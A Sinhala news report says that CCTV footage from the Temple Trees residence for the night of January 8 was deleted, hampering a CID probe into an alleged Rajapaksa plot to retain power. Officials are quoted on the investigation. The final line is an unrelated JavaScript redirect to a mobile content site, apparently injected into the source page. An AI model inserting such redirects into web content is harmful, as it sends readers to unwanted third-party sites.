අරලිය මැඳුරේ ජනවාරි 8 රාත‍්‍රී සීසීටීවී දර්ශන මකලා

නිමල් අබේසිංහ

ජනවාරි 8 වැනිදා රාත‍්‍රියේ අරලියගහ මන්දිරයේ සිදුවූ කුමන්ත‍්‍රණයට අදාළ විමර්ශන සඳහා අත්‍යවශ්‍ය වන ස්වයංක‍්‍රීයව පටිගත වන එම මන්දිරයේ සීසීටීවී කැමරා දර්ශන කිසිවකු විසින් මකා දමා ඇතැ’යි රාවයට වාර්තා වේ.

එම කුමන්ත‍්‍රණය ගැන විමර්ශන පවත්වන අපරාධ පරීක්ෂණ දෙපාර්තමේන්තුව විසින් නීතිපතිවරයා වෙත ඒ බව දන්වා එවා ඇති බවද නියෝජ්‍ය සොලිසිටර් ජෙනරාල් සෝභිත රාජකරුණා රාවය කළ විමසීමකදී පැවසීය.

ජනවාරි 8 රාත‍්‍රියේ අරලියගහ මන්දිරයේදී තවදුරටත් බලයේ රැඳී සිටීම සඳහා හිටපු ජනාධිපති මහින්ද රාජපක්ෂ හා ගෝඨාභය රාජපක්ෂ මහත්වරුන් ඇතුළු තවත් කිහිපදෙනකු එකතු වී කුමන්ත‍්‍රණයක් කරන ලදැ’යි විදේශ අමාත්‍ය මංගල සමරවීර මහතා පොලිස් මූලස්ථානයට පැමිණිල්ලක් කළ අතර, ඒ පැමිණිල්ල ගැන විමර්ශනය කරන අපරාධ පරීක්ෂණ දෙපාර්ත මේන්තුවට, මෙලෙස එදින රාත‍්‍රී සීසීටීවී කැමරාවල පටිගතවූ දර්ශන මකා දමා ඇති බව සොයා ගැනීමට හැකිවී තිබේ. මේ පිළිබඳව නීතිපති දෙපාර්තමේන්තුවට දැන ගන්නට ලැබුණු විට, නවීන තාක්ෂණය භාවිත කොට එම දර්ශන නැවත ලබා ගැනීමට කටයුතු කරන ලෙස තම දෙපාර්තමේන්තුව විසින් අපරාධ පරීක්ෂණ දෙපාර්තමේන්තුවට දුන් උපදෙස්වලට ඔවුන් එකඟ වූ බවද නියෝජ්‍ය සොලිසිටර් ජෙනරාල් රාජකරුණා රාවයට පැවසීය. කෙසේ වෙතත් ඉන්පසු විමර්ශනවල තත්ත්වය නීතිපති දෙපාර්තමේන්තුවට වාර්තා කොට නැත.

මේ ගැන කළ විමසීමේදී පොලිස් මාධ්‍ය ප‍්‍රකාශක රුවන් ගුණසේකර පැවසුවේ, විමර්ශන අවසන් කොට අදාළ ලිපිගොනුව නීතිපති දෙපාර්තමේන්තුවට යවා ඇති බවයි.

පසුගිය ජූලි මාසයේදී ජනමාධ්‍ය ප‍්‍රධානීන්ගේ හමුවකදී ජනාධිපති මෛත‍්‍රීපාල සිරිසේන කීවේ, 8 වැනිදා රාත‍්‍රියේ අරලියගහ මන්දිරයේ සිදුවූ සාකච්ඡුාව ගැන අපරාධ පරීක්ෂණ දෙපාර්තමේන්තුව පරීක්ෂණයක් පවත්වන බවත් එහි වාර්තාව නොබෝ දිනකින් තමාට ලැබෙනු ඇති බවත්ය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;